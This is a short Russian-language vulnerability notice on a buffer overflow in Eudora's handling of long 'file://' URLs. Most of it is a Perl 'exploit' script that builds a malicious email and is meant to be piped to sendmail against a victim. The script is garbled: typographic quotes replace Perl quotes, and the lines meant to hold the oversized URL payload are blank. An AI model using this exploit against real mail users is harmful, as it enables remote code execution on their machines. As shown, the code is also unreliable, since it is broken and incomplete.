Программа: Eudora 6.1, 6.0.3 и 5.2.1 

Переполнение буфера обнаружено в Eudora в ‘file://’ URL. Удаленный пользователь может выполнить произвольный код на уязвимой системе.
Удаленный пользователь может послать email сообщение, содержащее специально обработанный ‘file://’ URL, длиннее 300 символов, чтобы вызвать переполнение буфера и выполнить произвольный код на уязвимой системе. 

Эксплоит: 

#!/usr/bin/perl —
print «From: me\n»;
print «To: you\n»;
print «Subject: Eudora file URL buffer overflow demo\n»;
print «X-Use: Pipe the output of this script into: sendmail -i
victim\n\n»;
print «The following is a \»proper\» HTML URL, pointing to somewhere
long:\n»;
print » \n»;
print » \n»;
print «Fake URL to http://anywhere/I/want \n»;
print » \n»;
print «Clicking above will crash Eudora.\n\n»;
print «The following plain-text converted by Eudora into a clickable
URL\n»;
print «http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n»;
print «is for comparison: the user can hardly tell them apart.\n\n»;



Оставить мнение